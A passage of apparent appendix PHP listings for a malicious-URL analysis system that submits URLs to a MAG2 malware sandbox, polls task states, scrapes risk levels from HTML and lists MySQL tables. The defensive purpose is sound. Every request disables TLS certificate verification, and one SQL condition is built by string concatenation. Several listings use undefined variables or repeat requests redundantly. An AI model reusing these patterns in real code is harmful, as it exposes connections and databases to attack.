        ->addPostParameter('url', $url['url'])
        ->setConfig(array('ssl_verify_peer' => false));
    try {
        $response = $request->send();
        if (200 == $response->getStatus()) {
            // print_r($response->getBody());
            $mag2 = json_decode($response->getBody());
            $mag2 = $mag2->results[0];
        } else {
            echo 'Unexpected HTTP status: ' . $response->getStatus() . ' ' .
                $response->getReasonPhrase();
        }
    } catch (HTTP_Request2_Exception $e) {
        echo 'Error: ' . $e->getMessage();
    }
    if ($mag2 != false) {
        $request = new HTTP_Request2('https://mag2.norman.com/rapi/tasks?owner=vaagland');
        $request->setMethod(HTTP_Request2::METHOD_POST)
            ->setConfig(array('ssl_verify_peer' => false))
            ->addPostParameter('sample_id', $mag2->samples_sample_id)
            ->addPostParameter('env', "ivm")
            ->addPostParameter('tp_IVM.FIREWALL', 3);
        try {
            $response = $request->send();
            if (200 == $response->getStatus()) {
                $mag2_task = json_decode($response->getBody());
                $mag2_task = $mag2_task->results[0];
                $data = array('url_id'     => $url['url_id'],
                              'sample_id'  => $mag2_task->tasks_sample_id,
                              'task_id'    => $mag2_task->tasks_task_id,
                              'task_state' => $mag2_task->task_state_state);
                $db->insert('mag2_tasks', $data);
                $db->delete('url_analysis_queue',
                    array('url_id = ?'    => $url['url_id'],
                          'module_id = ?' => $module_id)
                );
            } else {
                echo 'Unexpected HTTP status: ' . $response->getStatus() . ' ' .
                    $response->getReasonPhrase();
            }
        } catch (HTTP_Request2_Exception $e) {
            echo 'Error: ' . $e->getMessage();
        }
    }
}
?>
B.13 MAG2 Results
<?php
/**
 * Zend Framework Bootstrap code from listing B.2 here
 */
require_once 'HTTP/Request2.php';
$module_id = 4;
$tasks = $db->fetchall("SELECT * FROM mag2_tasks WHERE task_state NOT LIKE 'CORE_COMPLETE'");
$data = array();
foreach ($tasks as $task) {
    $request = new HTTP_Request2('https://mag2.norman.com/rapi/tasks/' . $task['task_id']);
    $request->setMethod(HTTP_Request2::METHOD_GET)
        ->setConfig(array('ssl_verify_peer' => false));
    try {
        $response = $request->send();
        if (200 == $response->getStatus()) {
            $mag2 = json_decode($response->getBody());
            print_r($mag2);
            $data['task_state'] = $mag2->results[0]->task_state_state;
            var_dump($data);
        } else {
            echo 'Unexpected HTTP status: ' . $response->getStatus() . ' ' .
                $response->getReasonPhrase();
        }
    } catch (HTTP_Request2_Exception $e) {
        echo 'Error: ' . $e->getMessage();
    }
    if ($data['task_state'] == 'CORE_COMPLETE') {
        $db->update('mag2_tasks',
            array('task_state' => 'CORE_COMPLETE'),
            'task_id = ' . $task['task_id']);
        try {
            $response = $request->send();
            if (200 == $response->getStatus()) {
                $mag2 = json_decode($response->getBody());
            } else {
                echo 'Unexpected HTTP status: ' . $response->getStatus() . ' ' .
                    $response->getReasonPhrase();
            }
        } catch (HTTP_Request2_Exception $e) {
            echo 'Error: ' . $e->getMessage();
        }
        try {
            $response = $request->send();
            if (200 == $response->getStatus()) {
                $mag2 = json_decode($response->getBody());
            } else {
                echo 'Unexpected HTTP status: ' . $response->getStatus() . ' ' .
                    $response->getReasonPhrase();
            }
        } catch (HTTP_Request2_Exception $e) {
            echo 'Error: ' . $e->getMessage();
        }
        try {
            $response = $request->send();
            if (200 == $response->getStatus()) {
            } else {
                echo 'Unexpected HTTP status: ' . $response->getStatus() .
                    ' ' . $response->getReasonPhrase();
            }
        } catch (HTTP_Request2_Exception $e) {
            echo 'Error: ' . $e->getMessage();
        }
    }
}
?>
<?php
/**
 * Zend Framework Bootstrap code from listing B.2 here
 */
require_once 'HTTP/Request2.php';
try {
    $response = $request->send();
    if (200 == $response->getStatus()) {
        $mag2 = json_decode($response->getBody());
        $mag2 = $mag2->results[0];
    } else {
        echo 'Unexpected HTTP status: ' . $response->getStatus() . ' ' .
            $response->getReasonPhrase();
    }
} catch (HTTP_Request2_Exception $e) {
    echo 'Error: ' . $e->getMessage();
}
if ($mag2 != false) {
    $request = new HTTP_Request2('https://mag2.norman.com/rapi/tasks?owner=vaagland');
    $request->setMethod(HTTP_Request2::METHOD_POST)
        ->setConfig(array('ssl_verify_peer' => false))
        ->addPostParameter('sample_id', $mag2->samples_sample_id)
        ->addPostParameter('env', "ivm")
        ->addPostParameter('tp_IVM.FIREWALL', 3);
    try {
        $response = $request->send();
        if (200 == $response->getStatus()) {
            print_r($response->getBody());
            $mag2_task = json_decode($response->getBody());
            $mag2_task = $mag2_task->results[0];
            if ($url_id[0]['id']) {
                $data = array('url_id'     => $url_id[0]['id'],
                              'sample_id'  => $mag2_task->tasks_sample_id,
                              'task_id'    => $mag2_task->tasks_task_id,
                              'task_state' => $mag2_task->task_state_state);
                $db->insert('mag2_tasks', $data);
            } else {
                echo "whoops " . $sample['url'] . " is not in url table\n";
            }
        } else {
            echo 'Unexpected HTTP status: ' . $response->getStatus() . ' ' .
                $response->getReasonPhrase();
        }
    } catch (HTTP_Request2_Exception $e) {
        echo 'Error: ' . $e->getMessage();
    }
}
}
B.15 MAG2 Risk
<?php
/**
 * Zend Framework Bootstrap code from listing B.2 here
 */
require_once 'HTTP/Request2.php';
$module_id = 4;
foreach ($tasks as $task) {
    $response = $request->send();
    $html = $response->getBody();
    $lines = array();
    foreach (preg_split("/(\r?\n)/", $html) as $line) {
        $lines[] = $line;
        if (strstr($line, '<input type="hidden" name="anticsrf" value="')) {
            $csrf = trim($line);
        }
    }
    foreach ($response->getCookies() as $arCookie) {
        $request2->addCookie($arCookie['name'], $arCookie['value']);
    }
    $response = $request2->send();
    $html = $response->getBody();
    $lines = array();
    foreach (preg_split("/(\r?\n)/", $html) as $line) {
        $lines[] = $line;
        if (strstr($line, '<li><b>Risk level:</b>')) {
            $risk = trim($line);
        }
    }
    $data = $task;
    unset($data['task_state']);
    $data['risk'] = $risk;
    var_dump($data);
    $db->insert('mag2_risk', $data);
}
?>
B.16 MySQL
-- Host: localhost
-- Generation Time: Jun 11, 2012 at 11:55 AM
-- Server version: 5.1.61
-- PHP Version: 5.3.3-7+squeeze9

SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;

-- Database: `malurlman`

-- Table structure for table `analysis`
-- Table structure for table `analysis_module`
-- Table structure for table `analysis_module_results`
-- Table structure for table `domain`
-- Table structure for table `ip`
-- Table structure for table `ip_domain`
-- Table structure for table `ip_domain_url`
-- Table structure for table `mag2_risk`
-- Table structure for table `mag2_tasks`
-- Table structure for table `status`
-- Table structure for table `thug_samples`
-- Table structure for table `thug_tasks`
-- Table structure for table `url`
-- Table structure for table `url_analysis_queue`
-- Table structure for table `url_domain`
-- Table structure for table `url_queue`
-- Table structure for table `url_sources`
-- Table structure for table `url_status`
-- Table structure for table `whois`
-- Table structure for table `whois_data`
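The CREATE TABLE statements themselves did not survive in this listing. Purely as an inferred sketch, the queue table that the modules in listings B.7 through B.12 operate on could look like the following; the column names come from the queries those modules issue, while the types and the composite key are assumptions:

<?php
// Inferred sketch only: url_analysis_queue reconstructed from the columns
// the analysis modules actually SELECT and DELETE on (url_id, module_id).
// Types, the composite key, and any further columns are assumptions.
$db->query("
    CREATE TABLE url_analysis_queue (
        url_id    INT NOT NULL,
        module_id INT NOT NULL,
        PRIMARY KEY (url_id, module_id)
    )
");
?>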